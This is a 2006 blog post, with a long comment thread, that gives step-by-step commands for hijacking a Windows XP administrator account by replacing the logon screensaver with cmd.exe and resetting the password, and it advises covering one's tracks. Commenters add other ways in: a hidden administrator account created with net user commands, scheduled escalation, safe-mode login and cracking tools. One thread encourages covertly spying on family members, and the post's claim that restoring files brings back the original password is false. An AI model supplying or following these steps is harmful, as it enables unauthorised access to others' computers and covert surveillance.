Internet Business Daily

internet business : web trends : technology news

How to Hack a Window XP Admins Password

Posted by Quinn Zerfas On November - 2 - 2006

This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.

RSS feed | Trackback URI

351 Comments »

Comment by Mike McCormick
2006-11-02 18:17:35

Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?

Comment by poochee
2007-01-25 14:31:56

hi guys…pls teach how to make windows xp not to log on after a month or two months…pls

Comment by kaycee Subscribed to comments via email
2008-07-03 20:46:45

pls send me all window xp codes

Comment by rman
2008-07-11 15:30:20

dude if you want answers to any computer question you have got to check this out he has downloads/serials/computer how to’s basicly everything check it out it amazing and FREE

http://mrcomputerguy.blogspot.com

 
Comment by nirmal Subscribed to comments via email
2008-10-15 22:59:25

pls give me detail i want to break the administrator’s password without opening any users.
thanks.

Comment by rakesh
2008-10-21 00:17:39

ok
jst three steps are there click start then on run there type control userpasswords2 ok then u will get administator block there reset password option is there ok there no need of old password is there hope to get u r reply soon on pappucha@gmail.com and one more thing type the pattern same a i had written
ok enjy u r self

(Comments wont nest below this level)
Comment by Dalibor Subscribed to comments via email
2008-12-02 09:28:27

Hey this doen’t work at my college comp… You must be in admin group to do this… :(

 
 
 
 
Comment by sara Subscribed to comments via email
2008-11-17 22:06:15

restart your computer when bios screen u need press F8
continue after that u press safe mode with networing
some notes going u wait a while. after that u that windows user will be show u click administor go to control panel click remove password after click password will me reset then u restart ur computer.

 
Comment by VIJAYKRISHNA
2008-11-28 00:45:16

GO TO ADMINISTRATIVE TOOLS
IM THAT YOU HAVE LOCAL SECURITY POLICIES —> ACCOUNT POLICIES MAKE A SMALL RESEARCH THERE BECAUSE RIGHT NOW i’M IN LIMITED USER ACCOUNT LATER i MAY NOT CATCH UP YOU

 
 
Comment by anom Subscribed to comments via email
Comment by saravuth Subscribed to comments via email
2008-07-20 18:52:36

please post how to hack to administrator account for window xp sp2 again . please saravuthream@yahoo.com

thank in advance

Comment by vinod kumar Subscribed to comments via email
2008-09-11 23:16:17

dear sir.

how do hack administrator password.

 
 
 
Comment by Joshua Subscribed to comments via email
2007-04-18 20:50:24

My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks.
*JoSh*

Comment by mike Subscribed to comments via email
2007-11-25 10:16:05

yo, you can go to run and type in command prompt hit enter and it should open it in a different way so that wont happen anymore

 
Comment by darkmanxxx Subscribed to comments via email
2008-01-04 08:43:01

man the problem is your computer may have got a virus which first destroyed the cmd.exe file.so please first try to scan your computer with either updated F-Secure or Kaspersky new version

 
Comment by anonymous Subscribed to comments via email
2008-04-07 15:54:07

You can go to note pad or open windows internet explorer and right click and clikc source then when one of those is open type command.com then save the file as Anything You Want.bat then close ti and open it again for a command promt!

 
Comment by KK Raj Subscribed to comments via email
2008-04-12 22:22:02

Install “avira” antivirus in ur system

Comment by george
2008-08-07 01:26:55

hi guy I suppose you try eset antivirus it works miracles or mainatain your system with Iolo system mechanics

 
 
Comment by guy
2008-05-22 16:55:08

Open My Computer
Open Local Disk
Open Windows
Open System32
click on any file and start typing command
and then you should see it

Comment by hylan143 Subscribed to comments via email
2008-11-16 11:22:50

after you open the file what ru supposed to do? start typing “command”?

 
 
Comment by Samson Gama Subscribed to comments via email
2008-05-27 11:32:33

Goto C: Drive
Windows
System32
And look for cmd and drag it to the desktop

Comment by YOU DON"T KNOW ME Subscribed to comments via email
2008-06-02 12:33:56

This guy made such a fake name

 
 
Comment by john
2008-08-25 16:57:40

dude just put cmd.exe. thats it

 
Comment by dev
2008-10-15 03:25:30

pls format the window or repair command.com file

 
 
Comment by Joshua Subscribed to comments via email
2007-04-18 20:53:51

My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks for the help!
*JoSh*

Comment by Teece Subscribed to comments via email
2007-06-18 13:47:58

type “command” if “cmd” doesn’t work.
also “command.com” or “cmd.com” one of those four should work.
if it doesnt work u can email me for help
(teecehunter@yahoo.com)

 
Comment by Mechwarrior5 Subscribed to comments via email
2007-11-07 09:00:40

It’s because you renamed your cmd.exe to logon.scr, what you need to do is take cmd.exe and logon.scr out of the temphack folder you made and put them back into the system32 folder.

Comment by Duckii
2008-02-12 22:16:00

and how do u move ur temphack folder bak to ur system32 folder?

 
 
 
Comment by Daredevil Subscribed to comments via email
2007-09-19 23:35:39

Hey but that does’nt work bcoz my administrator deny the access even to change the name of the file …or delete the file

 
Comment by mano Subscribed to comments via email
2007-10-20 05:12:20

Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?

 
Comment by cred911 Subscribed to comments via email
2007-10-29 02:41:49

not working.. access denied :(

 
Comment by cred911 Subscribed to comments via email
2007-10-29 02:46:17

not working… access denied :( can’t chang password.. net user administrator * :( without login as power user :( :(

Comment by killer Subscribed to comments via email
2008-05-14 01:55:55

Dear…
you can chang only guest password but not admin ..for command net user..i will try also ..but not success.ok

 
Comment by AADW
2008-09-15 23:01:09

sEND ME THE TRICK TO HACK ADMIN PASSWORD

Comment by Had It Already Subscribed to comments via email
2008-09-26 16:51:52

Did you get the trick to hack into administrator password? I need it BAD! Lots of things going on at my house and hubby and son have everything blocked from me for the past month and half.

Comment by Chris
2008-11-15 06:02:05

Check out loginrecovery.com, they have a software that you can burn onto a disk and run at boot up. It will not replace the password that they have installed, however - it will let you know what password they have in there so you can log on without them knowing. That way you can pull a Ninja and see what they see without them the wiser.

I hope this helps
Chris

(Comments wont nest below this level)
 
 
 
 
Comment by matt Subscribed to comments via email
2008-03-20 02:52:35

wat is DOS

Comment by deepak
2008-06-28 00:21:35

disk operating system…………….. buddy

 
Comment by Josie
2008-07-06 11:48:01

um. Matt its Ur Disk operating system and you can get to it by going to your start menu and clicking “Run” and enter the code. cmd

Comment by hacker
2008-09-14 17:38:44

no you idiot, DOS and Command prompt are two different things.

if you type in CMD (usually) it will open up the command prompt. if you type in command.com in run, it will open up MS-DOS.

Yes, they look the same. Yes they work the same. But they are different.

 
 
 
Comment by Ricky Gervais Subscribed to comments via email
2008-06-28 07:05:16

Okay somebody try their hand at this one my admin has put a software called busines lock on my PC it stops me getting to Run command and most of the programmes in My computer it is password protected how the hell do I turn it off???????

 
Comment by rman
2008-07-11 15:27:53

ooh my god guys every one check this out any question you have this guy will answer it AND if you need a download or serial for a program he has it. im telling you guys check this out.

http://mrcomputerguy.blogspot.com

 
Comment by jake
2008-07-26 21:04:55

yeah when i goto make a directory it tells me access denied i think this is because of my lack of admuin or is this aupposed to happen pleahs help

 
Comment by Molly-Rose Subscribed to comments via email
2008-08-07 18:05:44

im in yr 7 and we have really good computers but its in classic version and it sucks. im really smart when it comes to computers but this one has me stuck. is there a simple way that i could change everything?

 
Comment by Nicky
2008-08-07 21:41:31

hi i was following the above steps and access was denied what do i do?

 
Comment by blaze
2008-10-25 08:24:40

no the password will not be restored

 
Comment by rex
2008-11-05 16:22:50

It will

 
 
Comment by Quinn Zerfas
2006-11-02 19:20:15

Yes, you are backing up theri login info, deleteing and making your own to get access. Puting the temphack files back is going to change restore the original information

 
Comment by zambuka
2006-11-02 21:25:32

uh.. no. First of all this is old. Second of all.. the original password WILL NOT be restored. Do you honestly think password hashes are stored in the command prompt executible or the screensaver????? Come on.. if you are going to give ‘hacking’ advice.. make sure you actually know what you’re talking about. So… where did you copy this info from?

 
Comment by Chris
2006-11-02 21:59:45

Mike, no, restoring the files won’t restore the original password. The one you just created will still be in effect.

Quinn, you are just backing up the tools used to change the password. The “net password” actually changes the password in another part of the machine that you haven’t touched yourself.

 
Comment by Black Ratchet
2006-11-02 22:03:45

No. You’re wrong. Once you change the local admin’s password, thats all she wrote. Unless you know his/her password already (so you can change it back), once you change it, it’s gone from the system.

Also, this breach won’t work if the system has NTFS as the file system, unless you have administrative rights, you won’t be able to delete logon.scr

This post is full of holes.

If you want to learn about /real/ hacking, check out Binary Revolution.

 
Comment by mhweaver
2006-11-02 22:42:53

No it won’t. You are replacing the screensaver (logonlscr) with a command prompt (cmd.exe). Putting the files back just puts the screensaver back the way it was, but not changing any other settings back.

The downside to this is you still need to be able to log in to move the files around :\

 
Comment by Dan Kordik
2006-11-02 22:49:56

a slightly shorter way of doing the same thing:

cd\
cd\windows\system32
mkdir temphack
move logon.scr temphack\logon.scr
copy cmd.exe logon.scr
exit

Comment by fan Twen Subscribed to comments via email
2007-02-18 09:30:44

This do not work with XP with a domain
can not move or delete logon.scr

if you have a solution to erase the admin password of my HP portable, i would be a,lot gratefull to you

 
Comment by Dalibor Subscribed to comments via email
2008-12-02 09:47:27

when i do this it says ”acces denied”.

 
 
Comment by Jim
2006-11-02 22:50:00

Why don’t you just delete sam that is the easiest admin password hack.

 
Comment by luser
2006-11-02 23:23:49

logon.scr is a protected file, you need admin privs to delete it. IF you already have admin privs needed to do this, then you could just change the administrator password yourself.

So, this isn’t really a hack.

 
Comment by Ivanmarsh
2006-11-03 00:27:01

A hack that requires you to be logged into the machine to set up the hack isn’t a hack. If you’re already logged into the machine what do you need the hack for?

Comment by Skeletor
2008-01-20 15:55:51

You are logged into the machine but not with administrative privileges. That’s what you need the hack for. And a brain, while you are at it.

 
 
Comment by Mark
2006-11-03 00:49:09

I wrote a simpler way to do this a long time ago. If you have ANY admin access, you can just use the command to change any other user’s password without knowing it. This was all previously covered @
http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/

 
Comment by Roman
2006-11-03 01:53:02

I tried on computer in A+spec class with restricted access it doesn’t work when i tried to make directory temphack it says access denied HELP

 
Comment by naxo
2006-11-03 11:49:16

try this http://ophcrack.sourceforge.net/. Works perfectly.

 
Comment by Anonymous NT Shaman
2006-11-03 11:52:29

Brilliant! You just wiped the admins’s password and he’s going to be quite cross with you!

The two files you’ve copied DO NOT contain the Admin’s password which you can’t get that way.

You’d have to use something like the NTBACKUP and have it save the registry (System State). Restoring the registry, would of course wipe your hacked account.

You’re better off doing something like this instead:

net user i0wnU SkR1ptK!ddY /add
net localgroup Administrators i0wnU /add

This won’t add you to the domain, but will add you to the local machine.

Also, you’ll find that on a properly hardened system, you will not have permissions to overwrite the screensaver.

However, if you are allowed to run the windows scheduler via the AT command, you can schedule the above net commands to do the same thing without messing about with the screen saver. (Provided the scheduler runs as the SYSTEM or an Admin)

i.e.

AT 06:06 NET USER ….
AT 06:07 NET LOCALGROUP …

And Bob’s your uncle.

Cheers!

 
Comment by Brian Snipes
2006-11-03 14:04:18

Wouldn’t you have to already have administrator privileges in order for this to work? I wouldn’t think a user that was only in the Users group would have permissions to overwrite those file on an NTFS filesystem. Perhaps the filesystem is FAT32?

 
Comment by Gv
2006-11-03 17:21:27

Ever heard of ERD commander?…. that would be much easier if you can’t into the comp to begin with do to a lock out … :)

Comment by learning Subscribed to comments via email
2007-08-07 14:11:27

Hello I see that you had offered some advice to someone back in 2006 about my loERD commander i have the software. We’ll what my problem is. I have a hard drive that i am trying to access but it is protected with a bios password. How can i get around it with the locksmith or can you tell me what script i should be looking for in command line once opened in notepad so i can change the value of 0 or 1 i don’t want to overwrite the hard drive. Any feed back would be greatly appreciated.

Thanks in advance!!!

 
 
Comment by gordon
2006-11-03 17:51:18

Normal system user does not have rights to copy, move , ren files in sys32. So useless useless you have rights to the C:.

 
Comment by exceed
2006-11-03 17:59:31

This only works in Windows 2000 and prior. Does not work in XP/2003. You must have Admin rights to modify files/folders in %SYSTEMROOT%\System32 directory in XP/2003.

Anyway, once you have physical access to machine use: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

 
Comment by Surferbill
2006-11-07 08:37:39

It’s a nice idea if you stick this on a USB stick and were scouring the school/office for unlocked, unattended PCs. As mentioned there are many better ways, but certainly this line would expose you straight away:

rename cmd.exe logon.scr

In effect you’ve moved cmd.exe meaning nobody on the machine can open a command prompt. Oops. :)

 
Comment by eric
2006-11-11 01:25:47

Nope. This does works on Windows XP (Most of the time). Some computers deny access while others do not. Luckily, our schools computers all have DeepFreeze so all I need to do to remove traces is to restart the computer.

 
Comment by Mike
2006-11-11 02:28:35

Now, to turn this into a useful function quickly (lost admin password.. mistyped admin password, admin is AWOL) you could boot a nice Linux kernal, mount NTFS, and make the quick file change(s) that would then allow you to assign a new admin password.

I’ve never attempted to do this, but am going to file it away as a quick way to clean up a bad problem. I have had to pull a file from a PC and send it somewhere to have them hack the SAM file.

Comment by fan Twen Subscribed to comments via email
2007-02-18 09:48:10

My XP-Pro is in a domain, and the Linux-life cd do not find the harddisk !

 
 
Comment by Marc
2006-11-12 20:11:28

If you are logged in as an administrator the easiest way to change any password, including THE administrator, is simply to run ‘control userpasswords2′ (without quotes) from a command prompt, then change at will.
If I can’t even get into the beast as an administrator I use a linux bootdisk which allows me to reset any password. If there’s another way I’d be delighted to learn it here.

Comment by wags Subscribed to comments via email
2008-04-19 16:46:25

I tried many of the above options on my XP Pro version with Novell and yours worked great. I enter the ‘control userpasswords2′ command and was able to change the administrator password. Working for a school this is great for all the donated computers we get. Thank you!

 
 
Comment by Mongo Joe
2006-11-12 22:18:03

Just restart the friggin machine and press f8 to log in under safe mode with networking. Then log in under the administrator whcih is usually passwordfree. Create you own username and then restart with admin privelages. Do whatever u want then restart with f8 safemode, go under administrator and delete the account u made!!!! wtf!! :) or use this service– http://www.loginrecovery.com

Comment by fan Twen Subscribed to comments via email
2007-02-18 09:57:05

This do not work with XP in a domain

if you have a better solution,
i wil be grateful to here about

 
 
Comment by chad
2006-11-13 00:31:05

actually there is a way to do this without logging in. you could use a windows 2000 installation disk and boot into the repair console to run the commands. while it is a windows 2000 disk, you can still use it to log into an xp installation. also a repair console from a windows xp disk will ask you for the administrator password whereas a win2k disk will not.
-cheers!